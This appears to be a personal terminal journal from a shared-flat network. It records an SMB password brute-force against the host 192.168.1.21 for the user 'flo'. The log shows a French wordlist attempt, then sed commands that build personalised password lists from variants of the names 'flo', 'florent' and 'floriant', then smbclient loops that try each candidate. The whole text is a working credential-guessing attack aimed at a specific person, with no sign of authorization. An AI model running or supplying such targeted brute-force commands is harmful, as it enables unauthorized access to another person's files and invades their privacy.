250619
21:34:46
n
computer
/home/n/machine/journal/2025/coloc_network/samoa/smbclient

bruteforce with richelieux (french rockyou)
and 800 password probable

250619-21:32:01-n@computer-~/machine/passwd_gen-
=> for P in $(cat richelieux) ; do echo "trying $P" ; smbclient -L //192.168.1.21 -U flo --password=$P | grep -v failed |tee found.passwd; done
=> nothing


250619-21:30:23-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/flo/g' study/prefixes_suffixes_sorted.txt | head 200 >> flo.passwd
head: cannot open '200' for reading: No such file or directory
(pip_env) 
250619-21:31:24-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/flo/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:31:35-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Flo/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:31:42-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/fl0/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:31:51-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Fl0/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:32:01-n@computer-~/machine/passwd_gen-
=> for P in $(cat flo.passwd) ; do echo "trying $P" ; smbclient -L //192.168.1.21 -U flo --password=$P | grep -v failed |tee found.passwd; done

250619-21:48:36-n@computer-~/machine/passwd_gen-
=> cat found.passwd 
(pip_env) 
250619-21:48:41-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/florent/g' study/prefixes_suffixes_sorted.txt | head 200 > flo.passwd
head: cannot open '200' for reading: No such file or directory
(pip_env) 
250619-21:51:36-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/florent/g' study/prefixes_suffixes_sorted.txt | head -200 > flo.passwd
(pip_env) 
250619-21:51:52-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Florent/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:52:10-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Fl0rent/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:52:21-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/fl0rent/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:52:34-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/floriant/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:53:04-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Floriant/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:53:12-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/Fl0riant/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:53:19-n@computer-~/machine/passwd_gen-
=> sed 's/_|-|_/fl0riant/g' study/prefixes_suffixes_sorted.txt | head -200 >> flo.passwd
(pip_env) 
250619-21:53:26-n@computer-~/machine/passwd_gen-
=> for P in $(cat flo.passwd) ; do echo "trying $P" ; smbclient -L //192.168.1.21 -U flo --password=$P | grep -v failed |tee found.passwd; done

